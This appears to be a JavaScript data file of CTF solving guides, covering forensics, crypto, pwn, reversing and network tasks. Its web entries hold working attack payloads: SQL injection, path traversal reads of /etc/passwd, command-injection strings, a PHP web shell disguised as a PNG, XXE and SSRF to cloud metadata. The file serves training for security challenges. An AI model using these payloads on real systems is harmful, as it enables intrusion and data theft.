import { expandedGuides } from "./expandedGuides.js";
import { guideDetails } from "./details.js";

export const categories = [
  "Forensics",
  "Web",
  "Cryptography",
  "Binary Exploit",
  "Reverse Engineering",
  "Network",
  "Logs",
  "General Skills",
];

const shell = (lines) => lines.join("\n");

export const guides = [
  {
    id: "binary-digits-image",
    category: "Forensics",
    difficulty: "Beginner",
    title: "Binary digits to image",
    aliases: ["digits.bin", "0 and 1 file", "binary text", "bits to jpg", "bits to png", "hidden in binary"],
    symptoms: "A .bin or .txt file contains a long stream of only 0 and 1 characters, often with no line breaks.",
    commands: [
      shell([
        "file digits.bin",
        "head -c 128 digits.bin",
        "python3 - <<'PY'",
        "from pathlib import Path",
        "p = Path('digits.bin')",
        "bits = ''.join(p.read_text().split())",
        "raw = bytes(int(bits[i:i+8], 2) for i in range(0, len(bits), 8))",
        "Path('decoded.bin').write_bytes(raw)",
        "print(raw[:16].hex())",
        "PY",
        "file decoded.bin",
        "open decoded.bin",
      ]),
      shell([
        "# If the first decode looks wrong, reverse bits inside each byte",
        "python3 - <<'PY'",
        "from pathlib import Path",
        "bits = ''.join(Path('digits.bin').read_text().split())",
        "bits = ''.join(bits[i:i+8][::-1] for i in range(0, len(bits), 8))",
        "Path('decoded_lsb.bin').write_bytes(bytes(int(bits[i:i+8], 2) for i in range(0, len(bits), 8)))",
        "PY",
        "file decoded_lsb.bin",
      ]),
    ],
    thought: [
      "First prove what the file really is. `file` saying ASCII text means the bytes are readable digits, not the final payload.",
      "A long string containing only 0 and 1 is probably bits. Grouping every 8 bits gives bytes.",
      "Check the first bytes after decoding. `ff d8 ff` means JPEG, `89 50 4e 47` means PNG, `50 4b` means ZIP.",
      "If a valid image appears, open it. Many easy forensics challenges hide the flag visually, so raw string search can miss it.",
      "If it still looks wrong, reverse bit order inside each byte and try again.",
    ],
    pitfalls: ["Do not run `strings` only. Visual flags inside decoded images will not appear in file strings.", "Do not assume `.bin` means executable or random binary."],
    example: {
      name: "digits.bin",
      walkthrough: [
        { step: "Inspect the file", command: "file digits.bin && head -c 64 digits.bin", why: "It shows ASCII text made of 0 and 1 characters, so the filename is a hint." },
        { step: "Group bits into bytes", command: "python3 bits_to_bytes.py", why: "Every 8 binary digits can represent one byte of a hidden file." },
        { step: "Identify the decoded output", command: "file decoded.bin", why: "Magic bytes reveal the payload type. A JPEG or PNG means the flag may be visible, not textual." },
        { step: "Open or OCR the image", command: "open decoded.bin", why: "Rendered text is not guaranteed to appear in `strings`." },
      ],
    },
  },
  {
    id: "metadata",
    category: "Forensics",
    difficulty: "Beginner",
    title: "Flag in metadata",
    aliases: ["exif", "metadata", "comment", "author", "gps", "hidden in properties"],
    symptoms: "Image, PDF, Office, audio, or video file looks normal but the prompt hints at author, camera, location, or properties.",
    commands: [shell(["file suspect.jpg", "exiftool suspect.jpg", "strings -a suspect.jpg | grep -iE 'flag|ctf|comment|author|gps'"])],
    thought: ["Metadata is structured text attached to the file, so inspect it before doing heavy stego.", "Look for Comment, Artist, Author, GPS, Software, Title, Subject, and CreateDate fields."],
    pitfalls: ["Some platforms strip EXIF. If metadata is empty, move to appended data or bit-plane analysis."],
  },
  {
    id: "wrong-extension",
    category: "Forensics",
    difficulty: "Beginner",
    title: "Wrong file extension",
    aliases: ["wrong extension", "unknown file", "magic bytes", "rename"],
    symptoms: "A file extension does not match the content, or the file will not open in its supposed app.",
    commands: [shell(["file challenge.dat", "xxd -l 32 challenge.dat", "cp challenge.dat fixed.zip  # only after file/magic confirms ZIP", "unzip -l fixed.zip"])],
    thought: ["Extensions are user-controlled. Magic bytes at the start reveal the real type.", "Rename only after confirming the signature."],
    pitfalls: ["Do not edit bytes just because the extension looks odd. Check the signature first."],
  },
  {
    id: "corrupt-header",
    category: "Forensics",
    difficulty: "Beginner",
    title: "Corrupted magic bytes",
    aliases: ["broken png", "corrupt jpg", "bad header", "fix magic"],
    symptoms: "File command says data, but the body contains recognizable chunks like IHDR, JFIF, PDF, or PK.",
    commands: [shell(["xxd -l 64 broken.png", "grep -abo 'IHDR\\|JFIF\\|PK\\x03\\x04\\|%PDF' broken.png", "# Example PNG magic repair", "printf '\\x89PNG\\r\\n\\x1a\\n' | dd of=broken.png bs=1 seek=0 conv=notrunc", "pngcheck broken.png"])],
    thought: ["Magic bytes identify the file. If only the header is damaged, replacing it can restore parser access.", "Always work on a copy."],
    pitfalls: ["Wrongly patching a file can destroy evidence. Copy first."],
  },
  {
    id: "appended-archive",
    category: "Forensics",
    difficulty: "Beginner",
    title: "Archive appended to image",
    aliases: ["polyglot", "zip after jpg", "appended data", "binwalk"],
    symptoms: "An image opens normally, but `binwalk` or hex shows ZIP/GZIP/PDF data later in the file.",
    commands: [shell(["binwalk suspect.png", "foremost -i suspect.png -o carved", "grep -abo 'PK\\x03\\x04' suspect.png", "dd if=suspect.png of=hidden.zip bs=1 skip=<offset>", "unzip hidden.zip"])],
    thought: ["Many formats ignore trailing bytes. Attackers can append a second file after a valid image.", "Find the embedded magic offset and carve from there."],
    pitfalls: ["Use `grep -abo` or binwalk offsets in decimal unless the tool says hex."],
  },
  {
    id: "nested-archives",
    category: "Forensics",
    difficulty: "Beginner",
    title: "Nested archives",
    aliases: ["zipception", "many zips", "tar gzip", "archive layers"],
    symptoms: "Extracting one archive reveals another archive repeatedly.",
    commands: [shell(["mkdir out", "7z x challenge.zip -oout", "find out -type f -maxdepth 4 -print -exec file {} \\;", "find out -type f -exec strings -a {} \\; | grep -E 'flag\\{|picoCTF\\{'"])],
    thought: ["Recursive extraction is the puzzle. Track every layer and scan after each extraction."],
    pitfalls: ["Watch for zip bombs. Avoid unlimited recursive scripts on untrusted huge files."],
  },
  {
    id: "password-archive",
    category: "Forensics",
    difficulty: "Easy",
    title: "Password-protected archive",
    aliases: ["zip password", "rar password", "zip2john", "john"],
    symptoms: "Archive asks for a password; prompt or metadata contains a wordlist clue.",
    commands: [shell(["zip2john locked.zip > zip.hash", "john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt", "john --show zip.hash", "unzip locked.zip"])],
    thought: ["First look for the password in challenge text, metadata, comments, and filenames. Crack only when hints imply weak password."],
    pitfalls: ["Blind cracking can waste time. Gather hints first."],
  },
  {
    id: "lsb-image",
    category: "Forensics",
    difficulty: "Easy",
    title: "Image LSB steganography",
    aliases: ["lsb", "zsteg", "bit plane", "least significant bit"],
    symptoms: "PNG/BMP looks normal; prompt mentions pixels, bits, colors, or subtle differences.",
    commands: [shell(["zsteg image.png", "python3 - <<'PY'", "from PIL import Image", "img=Image.open('image.png').convert('RGB')", "bits=[]", "for r,g,b in img.getdata(): bits.append(str(r&1))", "raw=bytes(int(''.join(bits)[i:i+8],2) for i in range(0,len(bits)-7,8))", "print(raw[:500])", "PY"])],
    thought: ["Lossless images can hide data in low bits. Try RGB channels and bit planes separately."],
    pitfalls: ["JPEG compression destroys simple LSB. If it is JPEG, try metadata, appended data, or visual clues first."],
  },
  {
    id: "alpha-channel",
    category: "Forensics",
    difficulty: "Easy",
    title: "Hidden alpha channel",
    aliases: ["alpha", "transparent", "rgba", "invisible"],
    symptoms: "PNG has transparency or invisible-looking content.",
    commands: [shell(["magick image.png -alpha extract alpha.png", "open alpha.png", "magick image.png -channel A -separate alpha.png"])],
    thought: ["The alpha channel is image data too. Extract it as grayscale and inspect visually."],
    pitfalls: ["Some viewers show transparency over white, hiding white-on-transparent text."],
  },
  {
    id: "image-difference",
    category: "Forensics",
    difficulty: "Easy",
    title: "Difference between two images",
    aliases: ["spot the difference", "diff image", "compare images"],
    symptoms: "Challenge gives two almost identical images.",
    commands: [shell(["magick compare a.png b.png diff.png", "magick a.png b.png -compose difference -composite diff.png", "open diff.png"])],
    thought: ["If two files are similar, subtract them. Hidden text often appears in the difference image."],
    pitfalls: ["Scale images to same dimensions first if compare complains."],
  },
  {
    id: "pdf-embedded",
    category: "Forensics",
    difficulty: "Easy",
    title: "PDF embedded files or hidden text",
    aliases: ["pdf", "embedded file", "object stream", "pdfimages"],
    symptoms: "PDF looks blank or ordinary; prompt hints at attachments, layers, or objects.",
    commands: [shell(["pdfinfo file.pdf", "exiftool file.pdf", "pdfimages -all file.pdf extracted", "binwalk -e file.pdf", "strings -a file.pdf | grep -E 'flag\\{|picoCTF\\{'"])],
    thought: ["PDFs are containers. Extract images, attachments, object streams, and metadata."],
    pitfalls: ["Copying visible text from a PDF may miss hidden layers or attachments."],
  },
  {
    id: "office-docx",
    category: "Forensics",
    difficulty: "Easy",
    title: "DOCX/PPTX/XLSX as ZIP",
    aliases: ["docx", "pptx", "xlsx", "office xml"],
    symptoms: "Office file may contain hidden comments, media, custom XML, or speaker notes.",
    commands: [shell(["unzip -l document.docx", "mkdir docx && unzip document.docx -d docx", "grep -RniE 'flag\\{|picoCTF\\{|comment|hidden' docx", "find docx/word/media -type f -exec file {} \\;"])],
    thought: ["Modern Office files are ZIP archives. The flag can hide in XML, comments, notes, or embedded media."],
    pitfalls: ["Do not rely only on opening in Word/PowerPoint."],
  },
  {
    id: "disk-image",
    category: "Forensics",
    difficulty: "Medium",
    title: "Disk image recovery",
    aliases: ["disk image", "fat", "ext4", "ntfs", "deleted file", "unallocated"],
    symptoms: "Challenge gives .img, .dd, .raw, .E01, ISO, or filesystem dump.",
    commands: [shell(["file disk.img", "mmls disk.img", "fls -o <offset> disk.img", "icat -o <offset> disk.img <inode> > recovered.bin", "strings -a disk.img | grep -E 'flag\\{|picoCTF\\{'"])],
    thought: ["Identify partitions, list filesystems, recover deleted files, then scan unallocated space."],
    pitfalls: ["Offsets from SleuthKit are usually sectors. Use the correct sector size."],
  },
  {
    id: "memory-volatility",
    category: "Forensics",
    difficulty: "Medium",
    title: "Memory dump triage",
    aliases: ["memory", "ram", "volatility", "process dump"],
    symptoms: "Large .raw/.mem dump, prompt mentions process, password, clipboard, browser, or malware.",
    commands: [shell(["volatility3 -f memory.raw windows.info", "volatility3 -f memory.raw windows.pslist", "volatility3 -f memory.raw windows.cmdline", "volatility3 -f memory.raw windows.netscan", "strings -a memory.raw | grep -E 'flag\\{|picoCTF\\{'"])],
    thought: ["Start with OS/profile, processes, command lines, network connections, then dump suspicious processes."],
    pitfalls: ["Memory dumps are huge. Use targeted plugins once you know the OS."],
  },
  {
    id: "audio-spectrogram",
    category: "Forensics",
    difficulty: "Easy",
    title: "Audio spectrogram",
    aliases: ["audio", "wav", "spectrogram", "morse", "dtmf"],
    symptoms: "Audio sounds odd, beeps, noise, or prompt says listen/look closer.",
    commands: [shell(["file sound.wav", "exiftool sound.wav", "sox sound.wav -n spectrogram -o spectrogram.png", "open spectrogram.png", "multimon-ng -a DTMF sound.wav"])],
    thought: ["Audio challenges often hide visual text in the frequency domain, or encode tones like Morse/DTMF."],
    pitfalls: ["Listening alone is often insufficient. Generate a spectrogram."],
  },
  {
    id: "video-frame",
    category: "Forensics",
    difficulty: "Easy",
    title: "One-frame video clue",
    aliases: ["video", "mp4", "frame", "qr in frame", "subtitles"],
    symptoms: "Video has a quick flash, odd subtitles, or prompt mentions frames.",
    commands: [shell(["ffmpeg -i video.mp4 frames/frame_%05d.png", "grep -RniE 'flag\\{|picoCTF\\{' .", "ffprobe video.mp4", "exiftool video.mp4"])],
    thought: ["Extract frames and inspect subtitle/metadata tracks. A QR or flag may appear for one frame."],
    pitfalls: ["Playback may skip the exact frame. Extract frames instead."],
  },
  {
    id: "browser-artifacts",
    category: "Forensics",
    difficulty: "Medium",
    title: "Browser history/cache/local storage",
    aliases: ["chrome history", "browser cache", "indexeddb", "localstorage", "cookies"],
    symptoms: "Challenge gives browser profile, app data folder, or disk image with user profile.",
    commands: [shell(["find . -iname 'History' -o -iname 'Cookies' -o -iname 'Local Storage' -o -iname 'IndexedDB'", "sqlite3 'History' 'select url,title,last_visit_time from urls order by last_visit_time desc limit 20;'", "grep -RaiE 'flag\\{|picoCTF\\{' ."])],
    thought: ["Modern apps store state in SQLite, LevelDB, LocalStorage, and cache files."],
    pitfalls: ["Chrome timestamps are WebKit microseconds, not Unix seconds."],
  },
  {
    id: "sql-injection",
    category: "Web",
    difficulty: "Easy",
    title: "SQL injection",
    aliases: ["sqli", "login bypass", "union select", "blind sql"],
    symptoms: "Login/search/id parameter behaves differently with quotes or SQL keywords.",
    commands: [shell(["curl -i 'http://host/item?id=1'", "curl -i \"http://host/item?id=1'\"", "sqlmap -u 'http://host/item?id=1' --batch --risk=1 --level=2", "sqlmap -u 'http://host/item?id=1' --dump --batch"])],
    thought: ["Test for syntax errors, then infer columns, then extract only the table/row that likely contains the flag."],
    pitfalls: ["Do not spray sqlmap on real targets. Use only CTF/lab hosts."],
  },
  {
    id: "lfi-path-traversal",
    category: "Web",
    difficulty: "Easy",
    title: "Path traversal / LFI",
    aliases: ["lfi", "file include", "../", "read flag file"],
    symptoms: "Parameter like `file=`, `page=`, `template=`, or `path=` returns file content.",
    commands: [shell(["curl 'http://host/view?file=../../../../etc/passwd'", "curl 'http://host/view?file=....//....//....//etc/passwd'", "curl 'http://host/view?file=/flag.txt'", "ffuf -u 'http://host/view?file=FUZZ' -w payloads/lfi.txt"])],
    thought: ["If the server reads a path from user input, climb directories and try known flag paths."],
    pitfalls: ["URL encode traversal if filters block raw `../`."],
  },
  {
    id: "ssti",
    category: "Web",
    difficulty: "Medium",
    title: "Server-side template injection",
    aliases: ["ssti", "jinja", "twig", "template injection"],
    symptoms: "Input is rendered into a template, and `{{7*7}}` returns 49.",
    commands: [shell(["curl -G 'http://host/' --data-urlencode 'name={{7*7}}'", "curl -G 'http://host/' --data-urlencode \"name={{config}}\"", "tplmap -u 'http://host/?name=test'"])],
    thought: ["Confirm expression evaluation, fingerprint the engine, then read files or execute commands according to the engine sandbox."],
    pitfalls: ["Payloads are engine-specific. Jinja, Twig, Freemarker, and Handlebars differ."],
  },
  {
    id: "command-injection",
    category: "Web",
    difficulty: "Easy",
    title: "Command injection",
    aliases: ["rce", "cmd injection", "ping form", "shell injection"],
    symptoms: "Form runs ping/nslookup/convert/git/curl with user input.",
    commands: [shell(["curl -G 'http://host/ping' --data-urlencode 'ip=127.0.0.1;id'", "curl -G 'http://host/ping' --data-urlencode 'ip=127.0.0.1&&cat /flag.txt'", "curl -G 'http://host/ping' --data-urlencode 'ip=$(cat /flag.txt)'"])],
    thought: ["Find command separators accepted by the shell, then run minimal read-only commands first."],
    pitfalls: ["Blind RCE may need DNS/HTTP callbacks, but avoid that unless challenge infrastructure allows it."],
  },
  {
    id: "file-upload",
    category: "Web",
    difficulty: "Medium",
    title: "File upload bypass",
    aliases: ["upload", "web shell", "mime", "extension bypass"],
    symptoms: "App accepts images/docs and stores them under web-accessible path.",
    commands: [shell(["curl -F 'file=@shell.php;type=image/png' http://host/upload", "printf '\\x89PNG\\r\\n\\x1a\\n<?php system($_GET[\"x\"]); ?>' > shell.php.png", "curl 'http://host/uploads/shell.php.png?x=id'"])],
    thought: ["Test extension, MIME, magic bytes, and storage path. Then use the smallest proof of execution."],
    pitfalls: ["Some servers do not execute uploaded files. Then pivot to path traversal, image parser bugs, or metadata."],
  },
  {
    id: "jwt",
    category: "Web",
    difficulty: "Easy",
    title: "JWT tampering",
    aliases: ["jwt", "token", "alg none", "hs256", "admin false"],
    symptoms: "Cookie or authorization header has three base64url sections starting with `eyJ`.",
    commands: [shell(["python3 - <<'PY'", "import base64,json", "tok='PASTE.JWT.HERE'", "for p in tok.split('.')[:2]: print(json.dumps(json.loads(base64.urlsafe_b64decode(p+'='*(-len(p)%4))),indent=2))", "PY", "jwt_tool TOKEN -t http://host/ -rc 'session=TOKEN'"])],
    thought: ["Decode first. If role/admin is client-side, test weak secret, alg confusion, or none only in CTF context."],
    pitfalls: ["Base64 decoding is not exploiting. Signature still matters."],
  },
  {
    id: "xxe",
    category: "Web",
    difficulty: "Medium",
    title: "XXE XML external entity",
    aliases: ["xxe", "xml", "entity", "doctype"],
    symptoms: "Endpoint accepts XML or SVG and parser errors mention entities.",
    commands: [shell(["curl -X POST http://host/xml -H 'Content-Type: application/xml' --data-binary @payload.xml", "cat > payload.xml <<'EOF'", "<?xml version='1.0'?><!DOCTYPE x [<!ENTITY f SYSTEM 'file:///flag.txt'>]><x>&f;</x>", "EOF"])],
    thought: ["If XML parser resolves external entities, local file reads can reveal the flag."],
    pitfalls: ["Some parsers block external entities but allow parameter entities or blind XXE."],
  },
  {
    id: "ssrf",
    category: "Web",
    difficulty: "Medium",
    title: "SSRF",
    aliases: ["ssrf", "url fetcher", "webhook", "metadata", "localhost"],
    symptoms: "App fetches a URL, image, webhook, preview, or import link supplied by user.",
    commands: [shell(["curl -G 'http://host/fetch' --data-urlencode 'url=http://127.0.0.1:80/'", "curl -G 'http://host/fetch' --data-urlencode 'url=http://localhost/admin'", "curl -G 'http://host/fetch' --data-urlencode 'url=http://169.254.169.254/latest/meta-data/'"])],
    thought: ["Make the server request internal resources you cannot reach directly."],
    pitfalls: ["Cloud metadata payloads are CTF-specific. Do not probe real cloud systems."],
  },
  {
    id: "idor",
    category: "Web",
    difficulty: "Easy",
    title: "IDOR / broken access control",
    aliases: ["idor", "object id", "user id", "access control"],
    symptoms: "URLs or API bodies use numeric IDs, usernames, document IDs, or predictable UUIDs.",
    commands: [shell(["curl -b cookies.txt 'http://host/api/user/1'", "for i in $(seq 1 50); do curl -s -b cookies.txt http://host/api/doc/$i | grep -E 'flag\\{|picoCTF\\{'; done"])],
    thought: ["If authorization checks are missing, changing IDs exposes another user's object."],
    pitfalls: ["Keep requests small. Rate limits can be part of the challenge."],
  },
  {
    id: "graphql",
    category: "Web",
    difficulty: "Medium",
    title: "GraphQL introspection / auth bypass",
    aliases: ["graphql", "introspection", "__schema"],
    symptoms: "Endpoint `/graphql` accepts JSON queries.",
    commands: [shell(["curl -s http://host/graphql -H 'Content-Type: application/json' -d '{\"query\":\"{__schema{types{name}}}\"}'", "graphqlmap -u http://host/graphql --method POST"])],
    thought: ["Use introspection to discover types and fields, then query likely flag/admin objects."],
    pitfalls: ["Auth may apply per field, not per endpoint."],
  },
  {
    id: "prototype-pollution",
    category: "Web",
    difficulty: "Medium",
    title: "Prototype pollution",
    aliases: ["prototype pollution", "__proto__", "constructor prototype", "nodejs"],
    symptoms: "Node/JS app merges JSON bodies or query objects into config/user objects.",
    commands: [shell(["curl -X POST http://host/api -H 'Content-Type: application/json' -d '{\"__proto__\":{\"isAdmin\":true}}'", "curl -X POST http://host/api -H 'Content-Type: application/json' -d '{\"constructor\":{\"prototype\":{\"admin\":true}}}'"])],
    thought: ["Polluting object prototypes can flip authorization or template behavior globally."],
    pitfalls: ["You need to know which property the app checks, like `isAdmin`, `role`, or `debug`."],
  },
  {
    id: "source-leak",
    category: "Web",
    difficulty: "Beginner",
    title: "Source leak / exposed files",
    aliases: [".git", "backup", "source map", ".env", "robots"],
    symptoms: "Website has exposed backup files, source maps, `.git`, `.env`, or comments.",
    commands: [shell(["curl http://host/robots.txt", "curl http://host/.env", "curl http://host/.git/HEAD", "wget -r http://host/.git/", "grep -RniE 'flag\\{|picoCTF\\{|secret|password|admin' ."])],
    thought: ["Before exploiting, look for leaked source. Source tells you exact routes, secrets, and flag paths."],
    pitfalls: ["Source maps can contain original frontend source but not backend secrets."],
  },
  {
    id: "classic-ciphers",
    category: "Cryptography",
    difficulty: "Beginner",
    title: "Classical cipher",
    aliases: ["caesar", "rot13", "vigenere", "atbash", "rail fence"],
    symptoms: "Ciphertext is mostly letters, no symbols, and challenge title sounds historical or wordplay-ish.",
    commands: [shell(["python3 - <<'PY'", "ct='PASTE'", "for s in range(26):", " print(s, ''.join(chr((ord(c)-65+s)%26+65) if c.isupper() else chr((ord(c)-97+s)%26+97) if c.islower() else c for c in ct))", "PY"])],
    thought: ["Check Caesar/ROT/Atbash before heavier crypto. Human-readable letter distributions are the clue."],
    pitfalls: ["Encoding is not encryption. Try base64/hex first if alphabet includes digits and symbols."],
  },
  {
    id: "xor",
    category: "Cryptography",
    difficulty: "Easy",
    title: "XOR cipher",
    aliases: ["xor", "single byte xor", "repeating key", "many time pad"],
    symptoms: "Binary-ish ciphertext, hint says exclusive, key, repeating, or known plaintext.",
    commands: [shell(["python3 - <<'PY'", "data=open('cipher.bin','rb').read()", "for k in range(256):", " out=bytes(b^k for b in data)", " if b'flag{' in out or b'picoCTF{' in out: print(k,out[:200])", "PY"])],
    thought: ["Single-byte XOR is brute-forceable. Repeating-key XOR needs keysize scoring or known plaintext."],
    pitfalls: ["If the output is compressed/encrypted-looking, try magic bytes as known plaintext."],
  },
  {
    id: "rsa-given-pq",
    category: "Cryptography",
    difficulty: "Easy",
    title: "RSA with p and q given",
    aliases: ["rsa", "p q", "n e c", "private key"],
    symptoms: "Challenge gives `n`, `e`, `c`, and also `p`, `q`, `phi`, `dp`, or `dq`.",
    commands: [shell(["python3 - <<'PY'", "from Crypto.Util.number import long_to_bytes", "p=0; q=0; e=65537; c=0", "n=p*q", "phi=(p-1)*(q-1)", "d=pow(e,-1,phi)", "print(long_to_bytes(pow(c,d,n)))", "PY"])],
    thought: ["RSA is broken if factorization or phi is given. Compute d and decrypt c."],
    pitfalls: ["Plaintext integer must be smaller than n. If not, parse inputs again."],
  },
  {
    id: "rsa-small-e",
    category: "Cryptography",
    difficulty: "Medium",
    title: "RSA small exponent",
    aliases: ["small e", "e=3", "hastad", "broadcast"],
    symptoms: "`e` is 3 or 5, no padding, same message possibly sent to multiple moduli.",
    commands: [shell(["python3 - <<'PY'", "import gmpy2", "c=0", "m,exact=gmpy2.iroot(c,3)", "print(exact, bytes.fromhex(hex(int(m))[2:]))", "PY"])],
    thought: ["If m^e < n and no padding is used, ciphertext is just an integer power. Take the e-th root."],
    pitfalls: ["If root is not exact, you may need broadcast/CRT or a different attack."],
  },
  {
    id: "rsa-shared-prime",
    category: "Cryptography",
    difficulty: "Medium",
    title: "RSA shared prime",
    aliases: ["common factor", "gcd", "shared p", "many moduli"],
    symptoms: "Multiple RSA public keys/moduli are provided.",
    commands: [shell(["python3 - <<'PY'", "import math", "ns=[...] ", "for i,n in enumerate(ns):", " for j,m in enumerate(ns[i+1:], i+1):", "  g=math.gcd(n,m)", "  if 1<g<n: print(i,j,g)", "PY"])],
    thought: ["Bad random prime generation can reuse p. GCD instantly factors both moduli."],
    pitfalls: ["Do pairwise GCD across all moduli, not just adjacent files."],
  },
  {
    id: "padding-oracle",
    category: "Cryptography",
    difficulty: "Hard",
    title: "CBC padding oracle",
    aliases: ["padding oracle", "cbc", "pkcs7", "invalid padding"],
    symptoms: "Server distinguishes padding errors from valid decryptions.",
    commands: [shell(["padbuster http://host/decrypt 'COOKIE_OR_TOKEN' 16 -cookies 'session=COOKIE_OR_TOKEN'", "python3 exploit_padding_oracle.py"])],
    thought: ["Different error messages leak whether guessed plaintext padding is valid. Recover block by block."],
    pitfalls: ["Normalize network noise. Use retries and compare status/body length."],
  },
  {
    id: "hash-crack",
    category: "Cryptography",
    difficulty: "Easy",
    title: "Hash identification and cracking",
    aliases: ["hash", "md5", "sha1", "bcrypt", "john", "hashcat"],
    symptoms: "Challenge gives a fixed-length hex/base64 string and asks for password/flag.",
    commands: [shell(["hashid hash.txt", "john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt", "hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt"])],
    thought: ["Identify hash mode, then try challenge-specific words before huge cracking."],
    pitfalls: ["Salted hashes need the correct input format."],
  },
  {
    id: "prng-seed",
    category: "Cryptography",
    difficulty: "Medium",
    title: "Predictable PRNG",
    aliases: ["random seed", "mt19937", "python random", "lcg"],
    symptoms: "Tokens are generated from time, Python random, C rand, or an LCG.",
    commands: [shell(["python3 - <<'PY'", "import random,time", "target='TOKEN'", "for seed in range(int(time.time())-86400, int(time.time())+1):", " random.seed(seed)", " # compare generated token here", "PY"])],
    thought: ["Non-crypto PRNGs are predictable if you know outputs or approximate generation time."],
    pitfalls: ["Use `secrets`/`os.urandom` outputs are not practically predictable."],
  },
  {
    id: "ret2win",
    category: "Binary Exploit",
    difficulty: "Easy",
    title: "ret2win buffer overflow",
    aliases: ["ret2win", "buffer overflow", "win function", "pwn beginner"],
    symptoms: "ELF has a `win`, `print_flag`, or `give_shell` function and vulnerable input.",
    commands: [shell(["checksec --file ./vuln", "nm -an ./vuln | grep -E 'win|flag|shell'", "python3 - <<'PY'", "from pwn import *", "elf=ELF('./vuln')", "print(hex(elf.symbols.get('win',0)))", "print(cyclic(200))", "PY"])],
    thought: ["Find offset to RIP/EIP, then overwrite return address with win function address."],
    pitfalls: ["On 64-bit, stack alignment may require a single `ret` gadget before win."],
  },
  {
    id: "format-string",
    category: "Binary Exploit",
    difficulty: "Medium",
    title: "Format string",
    aliases: ["printf", "format string", "%p", "%n"],
    symptoms: "Program passes user input directly to printf-like function.",
    commands: [shell(["python3 - <<'PY'", "from pwn import *", "for i in range(1,30): print(i, process('./vuln').sendlineafter(b'> ', f'%{i}$p'.encode()))", "PY"])],
    thought: ["Leak stack/libc/canary addresses with `%p`; write memory with `%n` when needed."],
    pitfalls: ["Find the correct argument offset before building writes."],
  },
  {
    id: "ret2libc",
    category: "Binary Exploit",
    difficulty: "Medium",
    title: "ret2libc",
    aliases: ["libc leak", "system bin sh", "rop"],
    symptoms: "NX enabled, buffer overflow exists, no direct win function.",
    commands: [shell(["ROPgadget --binary ./vuln | grep 'pop rdi'", "readelf -s ./vuln | grep puts", "ldd ./vuln", "one_gadget libc.so.6"])],
    thought: ["Leak a libc address, compute libc base, call system('/bin/sh') or print flag."],
    pitfalls: ["Remote libc may differ. Use provided libc or leak enough symbols."],
  },
  {
    id: "heap-tcache",
    category: "Binary Exploit",
    difficulty: "Hard",
    title: "Heap tcache poisoning",
    aliases: ["heap", "tcache", "double free", "use after free"],
    symptoms: "Menu program allocates/frees chunks; double free or UAF exists.",
    commands: [shell(["checksec --file ./heap", "python3 - <<'PY'", "from pwn import *", "elf=ELF('./heap')", "print(elf.checksec())", "PY"])],
    thought: ["Understand allocation sizes, get leak, poison freelist, overwrite hook/GOT/function pointer depending on protections."],
    pitfalls: ["glibc version matters. Safe-linking changes tcache attacks."],
  },
  {
    id: "strings-password",
    category: "Reverse Engineering",
    difficulty: "Beginner",
    title: "Password in strings",
    aliases: ["crackme", "strings", "password checker"],
    symptoms: "Small binary asks for password or license key.",
    commands: [shell(["file ./crackme", "strings -a ./crackme | grep -iE 'flag|pass|correct|wrong|key'", "ltrace ./crackme", "gdb ./crackme"])],
    thought: ["Start static. If strings show compare text or password, try it. If not, trace strcmp/memcmp."],
    pitfalls: ["Some binaries build the flag at runtime, so `strings` may be insufficient."],
  },
  {
    id: "xor-reverse",
    category: "Reverse Engineering",
    difficulty: "Easy",
    title: "XOR/decode loop in binary",
    aliases: ["xor loop", "encrypted strings", "decode function"],
    symptoms: "Binary contains encrypted-looking byte arrays and a loop with XOR/add/sub.",
    commands: [shell(["objdump -d ./chall | less", "rabin2 -zz ./chall", "ghidraRun", "python3 - <<'PY'", "data=[0x00,0x00]", "print(bytes(b^0x42 for b in data))", "PY"])],
    thought: ["Find the decode loop, copy constants, reimplement the loop in Python."],
    pitfalls: ["Watch signed char behavior and loop bounds."],
  },
  {
    id: "android-apk",
    category: "Reverse Engineering",
    difficulty: "Medium",
    title: "Android APK reversing",
    aliases: ["apk", "smali", "jadx", "android"],
    symptoms: "Challenge provides .apk or mobile app backup.",
    commands: [shell(["jadx-gui app.apk", "apktool d app.apk -o apkout", "grep -RniE 'flag|picoCTF|secret|password' apkout", "strings app.apk | grep -i flag"])],
    thought: ["APK is a ZIP with resources and bytecode. Decompile Java/Kotlin, inspect native libs and assets."],
    pitfalls: ["Secrets can be in native `.so` files, not Java."],
  },
  {
    id: "pyinstaller",
    category: "Reverse Engineering",
    difficulty: "Easy",
    title: "PyInstaller executable",
    aliases: ["pyinstaller", "python exe", "pyc"],
    symptoms: "Executable strings mention PyInstaller or Python archive.",
    commands: [shell(["python3 pyinstxtractor.py chall", "find . -name '*.pyc' -print", "uncompyle6 extracted.pyc"])],
    thought: ["Recover bundled Python bytecode, decompile, then read the logic."],
    pitfalls: ["Python version mismatch can break decompilers. Try pycdc too."],
  },
  {
    id: "wasm",
    category: "Reverse Engineering",
    difficulty: "Medium",
    title: "WebAssembly reversing",
    aliases: ["wasm", "wat", "webassembly"],
    symptoms: "Web challenge includes `.wasm` with validation logic.",
    commands: [shell(["wasm2wat chall.wasm -o chall.wat", "strings chall.wasm | grep -iE 'flag|pass|correct'", "wasm-decompile chall.wasm"])],
    thought: ["Convert WASM to readable text, locate exported validation functions and constants."],
    pitfalls: ["Frontend JS may transform input before passing it to WASM."],
  },
  {
    id: "http-pcap",
    category: "Network",
    difficulty: "Beginner",
    title: "HTTP flag in PCAP",
    aliases: ["pcap", "http", "wireshark", "follow tcp"],
    symptoms: "Capture contains web traffic, downloads, forms, cookies, or POST bodies.",
    commands: [shell(["tshark -r capture.pcap -Y http", "tshark -r capture.pcap -Y 'http.file_data' -T fields -e http.file_data", "foremost -i capture.pcap -o carved", "strings -a capture.pcap | grep -E 'flag\\{|picoCTF\\{'"])],
    thought: ["Follow HTTP streams and carve transferred files. Flags often appear in POST data, cookies, headers, or downloads."],
    pitfalls: ["Wireshark display filters and capture filters are different things."],
  },
  {
    id: "dns-exfil",
    category: "Network",
    difficulty: "Medium",
    title: "DNS exfiltration",
    aliases: ["dns", "subdomain", "exfil", "base32", "base64 dns"],
    symptoms: "Many DNS queries with long random-looking subdomains.",
    commands: [shell(["tshark -r capture.pcap -Y dns -T fields -e dns.qry.name", "tshark -r capture.pcap -Y dns -T fields -e dns.qry.name | cut -d. -f1 | tr -d '\\n'"])],
    thought: ["Extract query labels, join chunks, then decode hex/base32/base64."],
